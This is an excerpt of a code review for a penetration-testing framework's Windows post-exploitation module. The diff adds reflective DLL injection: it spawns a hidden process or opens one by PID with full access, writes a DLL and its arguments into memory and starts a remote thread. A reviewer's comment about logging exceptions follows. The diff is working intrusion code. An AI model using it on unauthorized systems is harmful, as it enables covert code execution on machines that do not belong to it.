modules/post/windows/manage/reflective_dll_inject.rb

```diff
@@ -6,45 +6,187 @@
+      return false
+    else
+      return true
+    end
+
+  end
+
+  def launch_process
+    process_name = sanitize_process_name(datastore['PROCESS'])
+    print_status("Launching #{process_name} ...")
+    channelized = datastore['WAIT'] != 0
+
+    process = client.sys.process.execute(process_name, nil,
+      'Channelized' => channelized,'Hidden' => true)
+
+    hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} created.")
+    [process, hprocess]
+  end
 
+  def inject_dll(process,dll_path)
+    library_path = ::File.expand_path(dll_path)
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    [exploit_mem, offset]
+  end
+
+  def open_process
     pid = datastore['PID'].to_i
-    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    if not pid_exists(pid)
+      print_bad("Pid not found")
+      [nil, nil]
+    else
+      print_status('Warning: output unavailable')
+      print_status("Opening handle to process #{datastore['PID']} ...")
+      hprocess = client.sys.process.open(datastore['PID'], PROCESS_ALL_ACCESS)
+      print_good("Handle opened")
+      [nil, hprocess]
+    end
+  end
+
+  def run_dll(dll_path)
+    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+    if datastore['PID'] <= 0
+      process, hprocess = launch_process
+    else
+      process, hprocess = open_process
+    end
+
+    if hprocess.nil?
+      print_bad("Execution finished")
+      return
+    end
+
+    exploit_mem, offset = inject_dll(hprocess,dll_path)
+
+    if datastore['ARGUMENTS'].nil?
+      arg_mem = nil
+    else
+      arg_mem = copy_args(hprocess)
+    end
+
+    print_status('Executing...')
+    hprocess.thread.create(exploit_mem + offset, arg_mem)
+
+    if datastore['WAIT'] != 0
+      sleep(datastore['WAIT'])
+    end
 
-    print_status("Injecting #{datastore['PATH']} into #{pid} ...")
-    dll_mem, offset = inject_dll_into_process(host_process, datastore['PATH'])
+    if datastore['PID'] <= 0
+      read_output(process)
+    end
 
-    print_status("DLL injected. Executing ReflectiveLoader ...")
-    host_process.thread.create(dll_mem + offset, 0)
-    print_good("DLL injected and invoked.")
+    if datastore['KILL'] == true
+      print_good("Killing process #{hprocess.pid}")
+      hprocess.kill(hprocess.pid)
+    end
+
+    print_good('Execution finished.')
   end
-end
 
+  def copy_args(process)
+    argssize = datastore['ARGUMENTS'].size + 1
+    arg_mem = process.memory.allocate(argssize, PAGE_READWRITE)
+
+    params = datastore['ARGUMENTS']
+    params += "\x00"
+
+    process.memory.write(arg_mem, params)
+    arg_mem
+  end
+
+  def read_output(process)
+    print_status('Start reading output')
+    begin
+      loop do
+        output = process.channel.read
+        output.split("\n").each { |x| print_good(x) }
+        break if output.length == 0
+      end
+    rescue ::Exception => e
+
```

Comment:
This should log **something** so the user knows that was an exception.

This would be sufficient at a minimum:
```suggestion
      print_error("Exception: #{e.inspect}")
```